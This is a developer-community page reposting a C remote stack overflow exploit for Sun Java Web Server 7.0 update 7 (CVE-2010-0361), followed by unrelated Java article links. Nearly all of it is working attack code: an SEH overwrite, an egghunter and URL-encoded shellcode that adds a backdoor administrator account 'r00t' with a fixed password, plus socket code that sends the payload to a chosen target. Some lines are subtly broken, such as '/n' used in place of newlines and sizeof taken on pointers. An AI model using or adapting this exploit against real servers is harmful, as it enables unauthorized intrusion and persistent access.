AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Sun Java Web Server version 7.0 update 7 remote stack overflow exploit

2010-07-04 825
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: /* Sun Java Web Server Exploit * Tested on: * Sun Java Web Server 7. 
/* Sun Java Web Server Exploit
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This vulnerability was identified by Evgeny Legerov
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Date: 23/01/2010
 */
 
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"
 
#pragma comment(lib, "ws2_32")
 
#define usage(){ (void)fprintf(stderr, "SJWSex vs Sun Java Web Server 7.0 u7/n(C) dmc <dmc@deadbeef.co.uk>/n/nExample: sjwsex.exe [ip] [port] [directory]/n");}
#define error(e){ (void)fprintf(stderr,"%s/n",e); return -1;}
 
// encoding the payloads in URL hex prevents it getting converted to unicode
char seh[] = "%ee%7b%01%12"; // 0x12017bee
char nextseh[] ="%eb%10%90%90"; // jmp
char *nop = "%90"; // nop
char egghunter[] = "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
char *egg = "%77%30%30%74%77%30%30%74"; // w00tw00t
// adduser r00t / r00tr00t123
char shellcode[] =
       "%89%e6%db%cd%d9%76%f4%58%50%59%49%49%49%49%43"
       "%43%43%43%43%43%51%5a%56%54%58%33%30%56%58%34"
       "%41%50%30%41%33%48%48%30%41%30%30%41%42%41%41"
       "%42%54%41%41%51%32%41%42%32%42%42%30%42%42%58"
       "%50%38%41%43%4a%4a%49%4b%4c%4d%38%4b%39%45%50"
       "%45%50%43%30%43%50%4d%59%4b%55%46%51%48%52%42"
       "%44%4c%4b%46%32%50%30%4c%4b%46%32%44%4c%4c%4b"
       "%51%42%44%54%4c%4b%42%52%46%48%44%4f%4f%47%51"
       "%5a%47%56%46%51%4b%4f%50%31%49%50%4e%4c%47%4c"
       "%43%51%43%4c%45%52%46%4c%47%50%49%51%48%4f%44"
       "%4d%43%31%48%47%4d%32%4c%30%46%32%46%37%4c%4b"
       "%50%52%44%50%4c%4b%47%32%47%4c%45%51%48%50%4c"
       "%4b%51%50%43%48%4d%55%49%50%44%34%51%5a%45%51"
       "%48%50%50%50%4c%4b%47%38%44%58%4c%4b%50%58%51"
       "%30%45%51%4e%33%4a%43%47%4c%51%59%4c%4b%47%44"
       "%4c%4b%45%51%4e%36%46%51%4b%4f%46%51%49%50%4e"
       "%4c%49%51%48%4f%44%4d%43%31%48%47%50%38%4b%50"
       "%43%45%4a%54%43%33%43%4d%4b%48%47%4b%43%4d%47"
       "%54%43%45%4a%42%46%38%4c%4b%50%58%46%44%45%51"
       "%48%53%42%46%4c%4b%44%4c%50%4b%4c%4b%50%58%45"
       "%4c%43%31%49%43%4c%4b%44%44%4c%4b%45%51%4e%30"
       "%4d%59%50%44%47%54%46%44%51%4b%51%4b%45%31%50"
       "%59%50%5a%46%31%4b%4f%4b%50%46%38%51%4f%50%5a"
       "%4c%4b%42%32%4a%4b%4b%36%51%4d%43%5a%43%31%4c"
       "%4d%4b%35%4e%59%45%50%43%30%43%30%46%30%43%58"
       "%46%51%4c%4b%42%4f%4d%57%4b%4f%48%55%4f%4b%4b"
       "%50%45%4d%46%4a%45%5a%45%38%49%36%4a%35%4f%4d"
       "%4d%4d%4b%4f%48%55%47%4c%45%56%43%4c%44%4a%4d"
       "%50%4b%4b%4d%30%42%55%44%45%4f%4b%50%47%42%33"
       "%42%52%42%4f%42%4a%43%30%46%33%4b%4f%4e%35%45"
       "%33%42%4d%45%34%46%4e%43%55%44%38%45%35%51%30"
       "%46%4f%43%53%47%50%42%4e%45%35%42%54%51%30%43"
       "%45%42%53%45%35%43%42%51%30%44%32%50%30%46%50"
       "%42%54%51%30%43%42%46%50%46%50%42%54%44%32%50"
       "%30%46%50%43%44%46%51%46%52%46%53%47%50%46%4f"
       "%51%51%50%44%51%54%47%50%51%36%46%46%51%30%42"
       "%4e%43%55%44%34%51%30%42%4c%42%4f%45%33%45%31"
       "%42%4c%43%57%43%42%42%4f%44%35%42%50%47%50%51"
       "%51%42%44%42%4d%45%39%42%4e%43%59%42%53%44%34"
       "%44%32%45%31%43%44%42%4f%43%42%42%53%51%30%42"
       "%52%46%50%46%50%42%54%51%30%46%4f%47%31%50%44"
       "%51%54%45%50%45%5a%41%41";
 
int send_buffer(int ipaddr, int port, char *buffer)
{
       SOCKET s;
       struct fd_set mask;
       struct timeval timeout;
       struct sockaddr_in server;
       WSADATA info;
       if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");
 
       s=socket(AF_INET,SOCK_STREAM,0);
       if (s==INVALID_SOCKET) error("[*] socket error");
       server.sin_family=AF_INET;
       server.sin_addr.s_addr=htonl(ipaddr);
       server.sin_port=htons(port);
 
       WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
       timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 
       select(s+1,NULL,&mask,NULL,&timeout);
       if(FD_ISSET(s,&mask))
       {
               if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error("[*] error sending buffer/n");
               closesocket(s);
               return 0;
       }
}
 
int main(int argc, char *argv[])
{
       char *verb="GET /";
       char *options="OPTIONS /";
       char *version=" HTTP/1.0";
       char *directory="";
       char *payload, *ptr, *buffer;
       char nops[31], padding[130];
 
       if(argc < 4)
       {
               usage();
               return 0;
       }
 
       memset(nops, 0x00, sizeof(nops));
       memset(padding, 0x00, sizeof(padding));
 
       int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
       directory = argv[3];
       fprintf(stderr, "SJWSex vs Sun Java Web Server 7.0 u7/n(C) dmc <dmc@deadbeef.co.uk>/n/n");
 
       // build payload and place shellcode in memory
       payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
       memset(payload, 0x00, sizeof(payload));
       ptr=payload;
 
       memcpy(ptr, verb, strlen(verb));
       ptr+=strlen(verb);
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, "/n/0", 2);
 
       fprintf(stderr, "%s/n", "[*] Filling memory with shellcode");
       for (int i=0; i<4; i++)
       {
               send_buffer(ipaddr, port, payload);
       }
 
       // build final buffer and overwrite seh
       // [ OPTIONS / | DIRECTORY | PADDING | EGG | SHELLLCODE | NEXTSEH | SEH | NOPS | EGGHUNTER | HTTPVERSION ]
       buffer=(char*)malloc(strlen(options)+strlen(directory)+strlen(egg)+strlen(shellcode)+strlen(nextseh)+strlen(seh)+strlen(egghunter)+strlen(version)+163);
       memset(buffer, 0x00, sizeof(buffer));
       ptr=buffer;
 
       memcpy(ptr, options, strlen(options));
       ptr+=strlen(options);
       memcpy(ptr, directory, strlen(directory));
       ptr+=strlen(directory);
       memcpy(ptr, "/", 1);
       ptr++;
 
       for(int i=0;i<129;i++)
               padding[i] = 'A';
 
       memcpy(ptr, padding, strlen(padding));
       ptr+=strlen(padding);
 
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
 
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
 
       memcpy(ptr, nextseh, strlen(nextseh));
       ptr+=strlen(nextseh);
 
       memcpy(ptr, seh, strlen(seh));
       ptr+=strlen(seh);
 
       for(int i=0;i<10;i++)
               strcat(nops, nop);
       memcpy(ptr, nops, strlen(nops));
       ptr+=strlen(nops);
 
       memcpy(ptr, egghunter, strlen(egghunter));
       ptr+=strlen(egghunter);
 
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, "/n/n/0", 3);
 
       fprintf(stderr, "%s/n", "[*] Sending final buffer");
       send_buffer(ipaddr, port, buffer);
       fprintf(stderr, "%s/n", "[*] Wait 2 minutes and connect with r00t / r00tr00t123");
 
       return 0;
}
文章标签:
Java
Web App开发
关键词:
Java remote
Java Web
Java version
Java update
web update
cnbird
目录
相关文章
liuyunshengsir
|
12天前
|
消息中间件 安全 Dubbo
java 的Remote 的使用
在Java中,"Remote" 的概念通常与Java RMI(Remote Method Invocation,远程方法调用)技术相关,它允许一个Java虚拟机(JVM)上的对象调用另一个JVM上对象的方法,就像调用本地对象一样。但是,值得注意的是,从Java 9开始,RMI已经被标记为不推荐使用(deprecated),并且在新版本的Java中可能不再得到支持和更新。尽管如此,了解RMI的基本概念仍然对理解分布式Java应用程序的设计和开发有所帮助。 ### RMI的基本步骤 1. **定义远程接口**: 远程接口是扩展了 `java.rmi.Remote` 接口的Java接口。它
liuyunshengsir
52 13
JavaPub
|
3月前
|
Java
Project facet Java version 1.8 is not supported解决记录
Project facet Java version 1.8 is not supported解决记录
JavaPub
26 1
月亮给我抄代码
|
4月前
|
SQL 分布式计算 Java
HiveOnSpark 报错:java.lang.IllegalStateException(Connection to remote Spark driver was lost)‘ Last kno
Hive On Spark 测试时遇到`java.lang.IllegalStateException`和`FileNotFoundException`,问题根源是 Spark 缺少 `hive-exec-3.1.3.jar`。解决方法:从 `$HIVE_HOME/lib/`复制该 jar 到 `$SPARK_HOME/jars/`,并使用 `hdfs dfs -put`命令将其上传至 HDFS 的 `/spark-jars/`(根据实际情况调整路径)。重启 Hive 元数据服务后问题解决。
月亮给我抄代码
157 0
HiveOnSpark 报错:java.lang.IllegalStateException(Connection to remote Spark driver was lost)‘ Last kno
JavaPub
|
3月前
|
Java
ElasticSearch启动报错 java version is an early-access build ,only use release builds【已解决】
ElasticSearch启动报错 java version is an early-access build ,only use release builds【已解决】
JavaPub
47 0
1493223335460998
|
4月前
|
Java Linux Maven
Autogen4j: the Java version of Microsoft AutoGen
Java version of Microsoft AutoGen, Enable Next-Gen Large Language Model Applications
1493223335460998
168 0
可为编程
|
SQL
Caused by: java.lang.IllegalArgumentException: Plugin [sql] was built for Elasticsearch version 7.3.
解决Elasticsearch启动拆分器版本问题
可为编程
78 0
游客4llb6htoixmxw
|
11月前
|
Java 编译器
this version of the Java Runtime only recognizes class file versions up to 52.0
this version of the Java Runtime only recognizes class file versions up to 52.0
游客4llb6htoixmxw
165 0
从未止步..
|
11月前
解决Caused by: java.lang.IllegalArgumentException: Unsupported class file major version 62问题~
解决Caused by: java.lang.IllegalArgumentException: Unsupported class file major version 62问题~
从未止步..
127 0
微风撞见云
|
Oracle Java 关系型数据库
输入java -version 命令行没反应的简单解决办法【亲测有效】
输入java -version 命令行没反应的简单解决办法【亲测有效】
微风撞见云
717 0
你挚爱的强哥
|
Java 编译器 Android开发
解决java compiler level does not match the version of the installed java project facet
解决java compiler level does not match the version of the installed java project facet
你挚爱的强哥
97 0

热门文章

最新文章

  • 1
    Java设计模式(一)----单例模式
  • 2
    Spring框架(SpringBoot)中redis报错(Could not get a resource from the pool、java.net.SocketTimeoutException)
  • 3
    B站韩顺平老师超全超详细的Java企业级学习路线图(后期整理每一小部分的学习内容)
  • 4
    Java设计模式的7种设计原则还有很多人不知道
  • 5
    【java开发系列】—— JDK安装
  • 6
    JAVA源码走读(一) HashMap与ArrayList
  • 7
    Java基础语法总结
  • 8
    java-vector hashtable过时?
  • 9
    Java基础05 实施接口
  • 10
    Java入门记(五):容器关系的梳理(下)——Map
  • 1
    实验目的1.编译安装httpd2.优化路径3.并将鲜花网站上传到web服务器为网页目录4.在客户机访问网站http://www.bdqn.com
    204
  • 2
    构建高效Python Web应用:异步编程与Tornado框架解析
    136
  • 3
    请描述在 Python WEB 开发中常用的测试方法。
    52
  • 4
    在 Python 中,如何处理 Web 请求和响应?
    102
  • 5
    Django是一个用Python编写的开源Web应用框架
    41
  • 6
    构建高性能Web应用:前端性能优化的关键策略与实践
    266
  • 7
    视觉智能平台常见问题之web端编辑器实现如何解决
    77
  • 8
    构建高性能Web应用的关键技术
    92
  • 9
    构建响应式Web界面:Flexbox的力量
    51
  • 10
    探索现代Web应用中的微前端架构
    76

    • 相关课程

    更多
  • 5天玩转Java面向对象编程
  • Java开发工具
  • 高校精品课-西安交通大学-Web 编程技术
  • Java 虚拟机原理
  • Java Web项目实战 - 图书商城
  • Java面试疑难点解析 - Java Web开发

    • 相关电子书

    更多
  • Web应用系统性能优化
  • 高性能Web架构之缓存体系
  • PWA:移动Web的现在与未来

    • 相关实验场景

    更多
  • 使用SLB+2ECS+NAS,部署电商web网站的高可用架构
  • 1分钟SAE部署Web在线游戏
  • 阿里云平台上进行Java程序的编译与运行
  • 云上Web及FTP
  • WEB网页编程实战
  • 使用Java面向对象编写网络通信程序应用
    • 下一篇
    基于LNMP搭建WordPress